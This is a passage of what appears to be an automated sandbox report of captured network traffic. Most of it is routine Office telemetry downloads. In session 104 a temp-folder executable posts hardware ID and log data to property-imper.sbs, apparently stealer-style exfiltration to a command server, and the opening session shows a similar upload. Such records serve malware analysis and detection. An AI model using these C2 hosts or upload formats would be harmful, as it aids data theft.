2024-11-22 19:36:37 UTC	2820	OUT	Data Raw: 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 Data Ascii: Sh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q
2024-11-22 19:36:39 UTC	1030	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h5lqkiuqt68suno755nmua75mg; expires=Tue, 18-Mar-2025 13:23:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EhnUEoFD65o2xJGd8qDk4RfeuiFjtv6CO6ENj%2BcUt%2B9Fqgo5%2BKMrEToelGc9OmBj8%2BNtBMzgchLdyHHy4%2Fpz%2FGcNMC8%2F4NDwEaIBWZtS1FbaUhfo8%2B%2B4JLYc7PTP6my5GIU5T00%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6b5e91ab090f7d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1514&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2845&recv_bytes=19112&delivery_rate=1863433&cwnd=235&unsent_bytes=0&cid=b22b91262205ff66&ts=2112&x=0"
2024-11-22 19:36:39 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-22 19:36:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.4	49859	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:38 UTC	192	OUT	GET /rules/rule702351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:38 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:38 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE017CAD3" x-ms-request-id: 1a87898e-001e-002b-2066-3b99f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193638Z-178bfbc474brk967hC1NYCfu60000000038g000000006gzm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:38 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.4	49860	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:38 UTC	192	OUT	GET /rules/rule702350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:38 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:38 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE6431446" x-ms-request-id: 87533e62-501e-008f-028c-3a9054000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193638Z-174c587ffdf4zw2thC1TEBu340000000020g000000005t4r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:38 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.4	49861	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:38 UTC	192	OUT	GET /rules/rule701251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:39 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:38 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE12A98D" x-ms-request-id: cb31e276-601e-00ab-1151-3c66f4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193638Z-178bfbc474bpscmfhC1NYCfc2c0000000210000000009p0e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:39 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.4	49862	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:38 UTC	192	OUT	GET /rules/rule701250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:39 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:38 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE022ECC5" x-ms-request-id: 16dd49bc-d01e-0066-804e-3cea17000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193638Z-174c587ffdfks6tlhC1TEBeza40000000210000000003hsg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:39 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.4	49863	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:38 UTC	192	OUT	GET /rules/rule700051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:39 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:39 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE10A6BC1" x-ms-request-id: 11574f01-801e-0067-6559-3cfe30000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193639Z-174c587ffdfldtt2hC1TEBwv9c00000001p000000000kgcg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:39 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.4	49865	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:40 UTC	192	OUT	GET /rules/rule700050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:41 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:40 GMT Content-Type: text/xml Content-Length: 1352 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BE9DEEE28" x-ms-request-id: 731b5b9c-601e-0001-6b71-3cfaeb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193640Z-174c587ffdf9xbcchC1TEBxkz400000001n000000000srt9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:41 UTC	1352	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.4	49866	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:40 UTC	192	OUT	GET /rules/rule702951v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:41 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:41 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE12B5C71" x-ms-request-id: b43d4aba-301e-0020-1845-3c6299000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193640Z-15b8b599d88wn9hhhC1TEBry0g00000001v000000000mvpt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:41 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	49871	172.67.162.84	443	6588	C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:40 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=LC8DG60TSLMZDIX88 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8784 Host: property-imper.sbs
2024-11-22 19:36:40 UTC	8784	OUT	Data Raw: 2d 2d 4c 43 38 44 47 36 30 54 53 4c 4d 5a 44 49 58 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 30 30 43 34 30 32 30 34 33 36 39 42 41 31 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 4c 43 38 44 47 36 30 54 53 4c 4d 5a 44 49 58 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 43 38 44 47 36 30 54 53 4c 4d 5a 44 49 58 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 Data Ascii: --LC8DG60TSLMZDIX88Content-Disposition: form-data; name="hwid"CF00C40204369BA1D7CBBD6DF28D3732--LC8DG60TSLMZDIX88Content-Disposition: form-data; name="pid"2--LC8DG60TSLMZDIX88Content-Disposition: form-data; name="lid"LOGS11--LiveTraf
2024-11-22 19:36:41 UTC	1015	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=evvnlhj3uklee2tsfaruh7pjoi; expires=Tue, 18-Mar-2025 13:23:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L0Rop3PwDr1Hy9IIeyMplr%2BWTeKvaygHT%2BoqiVsRAGIaoDOYuVPuV7uEegz6RcaLzC3mo%2FTMU0xWaqTKCh3ZqiHg3KIl5EteaIOXI2WeJLfVcAkLpCzfgadVmRWzWq6vVShP8s8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6b5ea84a3778d6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1812&sent=9&recv=14&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9724&delivery_rate=1586956&cwnd=146&unsent_bytes=0&cid=fb1d66f98a224a35&ts=907&x=0"
2024-11-22 19:36:41 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-22 19:36:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.4	49868	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:40 UTC	192	OUT	GET /rules/rule701151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:41 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:41 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE055B528" x-ms-request-id: 07391f24-a01e-0032-508c-3a1949000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193641Z-178bfbc474bscnbchC1NYCe7eg00000003g000000000n5ye x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:41 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.4	49867	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:40 UTC	192	OUT	GET /rules/rule702950v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:41 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:41 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDC22447" x-ms-request-id: 008b0be1-f01e-001f-587c-3b5dc8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193641Z-174c587ffdfks6tlhC1TEBeza400000001yg00000000c7x8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:41 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.4	49869	13.107.246.63	443

